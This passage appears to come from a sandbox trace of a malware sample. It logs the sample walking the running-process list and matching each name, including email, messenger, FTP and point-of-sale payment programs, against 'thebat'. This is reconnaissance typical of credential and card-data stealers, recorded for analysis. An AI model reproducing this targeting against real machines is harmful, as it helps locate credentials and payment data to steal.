lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.674] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357c0d8 [0099.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x357c0d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0099.674] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0099.674] StrStrIA (lpFirst="operamail.exe", lpSrch="thebat") returned 0x0 [0099.674] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0099.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.675] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c1b0 [0099.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x357c1b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0099.675] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0099.675] StrStrIA (lpFirst="pidgin.exe", lpSrch="thebat") returned 0x0 [0099.675] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0099.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.676] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357c0c0 [0099.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x357c0c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0099.676] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0099.676] StrStrIA (lpFirst="scriptftp.exe", lpSrch="thebat") returned 0x0 [0099.676] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0099.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.677] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357c120 [0099.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x357c120, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0099.677] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0099.677] StrStrIA (lpFirst="skype.exe", lpSrch="thebat") returned 0x0 [0099.677] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0099.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.678] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c1e0 [0099.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x357c1e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0099.679] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0099.679] StrStrIA (lpFirst="smartftp.exe", lpSrch="thebat") returned 0x0 [0099.679] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0099.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.680] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357c000 [0099.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x357c000, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0099.680] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0099.680] StrStrIA (lpFirst="thunderbird.exe", lpSrch="thebat") returned 0x0 [0099.680] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0099.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.681] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c198 [0099.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x357c198, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0099.681] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0099.681] StrStrIA (lpFirst="totalcmd.exe", lpSrch="thebat") returned 0x0 [0099.681] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0099.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.682] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c018 [0099.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x357c018, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0099.682] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0099.682] StrStrIA (lpFirst="trillian.exe", lpSrch="thebat") returned 0x0 [0099.682] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0099.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.683] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c510 [0099.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x357c510, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0099.683] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0099.683] StrStrIA (lpFirst="webdrive.exe", lpSrch="thebat") returned 0x0 [0099.683] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0099.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.684] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c558 [0099.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x357c558, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0099.684] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0099.685] StrStrIA (lpFirst="whatsapp.exe", lpSrch="thebat") returned 0x0 [0099.685] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0099.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.685] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c540 [0099.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x357c540, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0099.686] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0099.686] StrStrIA (lpFirst="winscp.exe", lpSrch="thebat") returned 0x0 [0099.686] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0099.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.687] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357da68 [0099.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357da68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0099.687] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0099.687] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="thebat") returned 0x0 [0099.687] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0099.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0099.688] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357d908 [0099.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357d908, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0099.688] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0099.688] StrStrIA (lpFirst="active-charge.exe", lpSrch="thebat") returned 0x0 [0099.688] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0099.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.689] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c408 [0099.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x357c408, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0099.689] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0099.689] StrStrIA (lpFirst="accupos.exe", lpSrch="thebat") returned 0x0 [0099.689] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0099.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.692] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357c348 [0099.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x357c348, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0099.692] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0099.692] StrStrIA (lpFirst="afr38.exe", lpSrch="thebat") returned 0x0 [0099.692] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0099.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.693] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c420 [0099.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x357c420, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0099.693] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0099.693] StrStrIA (lpFirst="aldelo.exe", lpSrch="thebat") returned 0x0 [0099.694] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0099.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0099.695] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x357c360 [0099.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x357c360, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0099.695] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0099.695] StrStrIA (lpFirst="ccv_server.exe", lpSrch="thebat") returned 0x0 [0099.695] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0099.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0099.696] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357db88 [0099.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357db88, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0099.696] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0099.696] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="thebat") returned 0x0 [0099.696] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0099.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0099.697] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357dbe8 [0099.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357dbe8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0099.697] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0099.697] StrStrIA (lpFirst="creditservice.exe", lpSrch="thebat") returned 0x0 [0099.698] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0099.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.699] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c438 [0099.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x357c438, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0099.699] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0099.699] StrStrIA (lpFirst="edcsvr.exe", lpSrch="thebat") returned 0x0 [0099.699] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0099.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.700] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357c528 [0099.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x357c528, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0099.700] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0099.700] StrStrIA (lpFirst="fpos.exe", lpSrch="thebat") returned 0x0 [0099.700] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0099.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.702] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c588 [0099.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x357c588, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0099.702] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0099.702] StrStrIA (lpFirst="isspos.exe", lpSrch="thebat") returned 0x0 [0099.702] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0099.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.703] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d9c8 [0099.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357d9c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0099.703] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0099.703] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="thebat") returned 0x0 [0099.703] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0099.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.704] LocalAlloc 